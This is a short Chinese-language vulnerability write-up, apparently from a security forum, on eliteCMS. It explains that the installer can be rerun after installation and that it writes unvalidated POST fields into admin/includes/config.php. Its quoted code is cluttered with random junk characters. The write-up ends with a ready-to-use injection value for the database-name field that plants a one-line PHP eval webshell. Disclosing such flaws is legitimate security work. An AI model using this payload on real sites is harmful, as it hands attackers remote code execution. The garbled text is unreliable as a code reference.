eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装4 `- V w$ j& N+ o5 z0 H. g8 W
) A. w9 ^- K" I( |
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
8 J! ]+ @) b& p4 c0 E我们来看代码:, }) S& L: \8 Q* z7 |- }0 H$ k1 N
+ x$ G& f- |6 D. U, ^8 B8 |1 V
...
; v9 i8 c L U+ W" [elseif ($_GET['step'] == "4") {
' u4 |" D: [- H( L $file = "../admin/includes/config.php";
, Z; m' _9 R/ p2 z2 l" h+ @( N $write = "<?php\n";
3 ?2 h, E A6 [& @2 p $write .= "/**\n";
+ ]. N' n$ ^) M$ n( R $write .= "*\n";
! P/ I; P8 D# E# ` $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";+ {& A: M1 W8 p$ j" X
...略...4 E0 {! V+ T8 z# @( [4 y
$write .= "*\n";
$ J% e, b; X0 v) D: i $write .= "*/\n";
% X4 t7 B. i/ W' E6 l! N5 J6 m $write .= "\n";
) u' ]) E; M2 K4 s1 V $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
/ Y, T7 V9 ^) M3 P7 _/ V$ D% C $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
0 ?0 w( T1 G. \3 _ $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";% K+ R" V r) G* c' z8 q& h
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
3 I) e* |1 x' X4 g; e- c3 |3 d( P $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
& r3 ], g& T" p0 E5 c $write .= "if (!\$connection) {\n";3 M9 z9 t3 m) @: o; X' y1 m3 E: U
$write .= " die(\"Database connection failed\" .mysql_error());\n";$ ~+ J" k, o+ V3 \; q
$write .= " \n";1 s( i l" R9 P3 C
$write .= "} \n";
1 G4 x9 J& q# Q2 O( V3 W0 X7 | i $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
1 _0 s" V) e3 k6 l; X- z $write .= "if (!\$db_select) {\n";
6 o5 ]9 ]: }) E $write .= " die(\"Database select failed\" .mysql_error());\n";
( R& D9 G. l2 t2 W $write .= " \n";* o9 d6 n% }( y" D6 [! ^/ Y
$write .= "} \n";
2 d' Q0 J: j4 R' d4 \' s $write .= "?>\n";
1 s; S9 i" \9 R" p4 l6 G 1 E$ L" [0 z- a0 b% N
$writer = fopen($file, 'w');
# R% P2 u. O7 U* ]! f) D...
% J8 |0 s2 |0 \; W, {( e ; _/ j9 H% c1 w3 m6 v+ x2 f
在看代码:4 k! \4 S( Y/ c: N; Q
, g1 T- U3 ]0 o# ~% B$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
- S: K4 b$ k1 e! Y1 E1 W3 T$ a5 M T$_SESSION['DB_NAME'] = $_POST['DB_NAME'];/ z7 b6 Q& m: G3 a; _& M6 _# x
$_SESSION['DB_USER'] = $_POST['DB_USER']; ]" h* Q; M% Z- y. r% Y. k
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
/ H* z+ ^! g% g " C4 T6 ]+ H, o& ?+ J/ Z$ y$ E8 i1 L
取值未作任何验证/ u9 ^# j0 C7 h1 P. ~' x! z! F
如果将数据库名POST数据:
' ?3 M, w2 R6 ^* @$ W$ ~3 `% p3 K9 N 1 b+ X; ]$ Z5 U |0 I4 [
"?><?php eval($_POST[c]);?><?php
- B8 A1 n, E" u& D7 v/ J$ s
# k% \5 S; }' r. {: |( u将导致一句话后门写入/admin/includes/config.php- W* B' K' y8 Y* n( D+ J# b. X
|